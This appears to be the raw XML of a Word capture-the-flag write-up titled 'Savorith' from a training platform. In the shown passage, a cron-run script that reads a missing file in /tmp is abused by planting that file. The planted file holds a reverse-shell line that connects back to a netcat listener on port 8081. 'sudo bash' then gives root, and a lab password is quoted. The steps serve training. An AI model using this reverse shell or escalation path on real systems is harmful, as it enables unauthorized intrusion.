            <wp:docPr id="18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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex San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A crontab task was identified running with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UID 1002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, which executes the script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/opt/healthcheck.sh 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periodically.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63700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="19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UID 1002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belonged to user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admin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/etc/passwd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grep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52500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="19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2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Upon analyzing the contents of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healthcheck.sh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file, it was identified that it references two files in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/tmp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directory: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health.log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check.conf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84500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="19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/tmp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directory only contains the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health.log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file and does not contain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check.conf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file.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healthcheck.sh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is executed by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admin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user; therefore, the lack of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check.conf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creates a window where arbitrary configuration files placed in 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/tmp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would be consumed by the script and executed with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admin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privileges, allowing for elevated command execution.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/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5776913" cy="3221740"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="220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6913" cy="322174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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex San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The file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check.conf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was created in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/tmp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directory to be executed by the script.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#!/bin/bahs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012B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/bin/bash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"sh -i &gt;&amp; /dev/tcp/&lt;your-ip&gt;/8081 0&gt;&amp;1"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16100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="223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6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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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Netcat </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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was started on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port 8081</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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awaiting the reverse connection.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reverse shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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was established on the system with the admin user.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01900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="224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</w:rPr>
      </w:pPr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Privilege Escalation – Obtaining the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000"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  <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="ff0000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 acesso ao usuário admin, foi verificado quais permissões </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo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ele possui através do comando </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l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utilizando as mesmas credenciais obtidas anteriormente da aplicação </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">web e FTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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With access to the admin user,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sudo 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permissions it possessed were verified using the command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sudo -l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, utilizing the same credentials previously obtained from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web application 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FTP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senha:Qm3hvAzpM6OJ7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603500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="226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0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex San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The user admin has permission to execute any command as root.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With this privilege, it was possible to obtain a root shell through the command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sudo bash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955800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="229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sectPr>
      <w:headerReference r:id="rId66" w:type="default"/>
      <w:headerReference r:id="rId67" w:type="first"/>
      <w:headerReference r:id="rId68" w:type="even"/>
      <w:footerReference r:id="rId69" w:type="default"/>
      <w:footerReference r:id="rId70" w:type="first"/>
      <w:footerReference r:id="rId71" w:type="even"/>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="0" w:left="1440" w:right="1440" w:header="0" w:footer="85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IBM Plex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IBM Plex Sans SemiBol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C">
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">© 2025 Hacking Club |All rights reserved </w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">                                         Page </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000"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6">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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47">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.k8gva5z4x926" w:id="6"/>
    <w:bookmarkEnd w:id="6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-866769</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>95250</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="719138" cy="232221"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="203" name="image30.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image30.jpg"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect b="28627" l="0" r="-7644" t="36271"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="719138" cy="232221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48"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360" w:lineRule="auto"/>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:color w:val="000000"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="3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49">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:pict>
        <v:shape id="WordPictureWatermark1" style="position:absolute;width:617.76pt;height:793.4866141732284pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:absolute;margin-left:-73.98425196850394pt;mso-position-vertical-relative:margin;mso-position-vertical:absolute;margin-top:-1.2459055118110236pt;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId2" o:title="image33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A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-942969</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7820025" cy="10085729"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="211" name="image32.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image32.png"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect b="8816" l="0" r="0" t="0"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="7820025" cy="1008572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-349240</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5767071</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6696075" cy="3025204"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="182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390550" y="2454150"/>
                        <a:ext cx="5910900" cy="265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20" w:before="480" w:line="275.9999942779541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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
                              <w:b w:val="0"/>
                              <w:i w:val="1"/>
                              <w:smallCaps w:val="0"/>
                              <w:strike w:val="0"/>
                              <w:color w:val="ffffff"/>
                              <w:sz w:val="48"/>
                              <w:vertAlign w:val="baseline"/>
                            </w:rPr>
                            <w:t xml:space="preserve">Writeup - Savorith</w:t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-349240</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5767071</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6696075" cy="3025204"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="182" name="image59.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image59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96075" cy="3025204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rPr>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:pict>
        <v:shape id="WordPictureWatermark2" style="position:absolute;width:617.76pt;height:793.4866141732284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33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0.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId45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1.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId4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app.hackingclub.com/training/training-machines/274#" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DominicBreuker/pspy" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DominicBreuker/pspy" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4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BMPlexSans-regular.ttf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-bold.ttf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-italic.ttf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-boldItalic.ttf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-italic.ttf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-bold.ttf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-boldItalic.ttf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold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0.jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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2.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59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W/0e65ydd2mq5x6B5NxXXiBjyw==">CgMxLjAyDmguYzUzc212Ynk1dm9mMg5oLjJ3aWltcTR3ZnBuaDINaC5vYmJxN3NzYXA2NzIOaC5kM3liOXI0MTdrM2MyDmguNndhbHg5bXY3ajk2Mg5oLmtjaWYydHF0anZoaDIOaC5rOGd2YTV6NHg5MjY4AHIhMTNacXlhQnJhTkRJcHYxVS1ZbDFqb1p3bzlXMGNLYndH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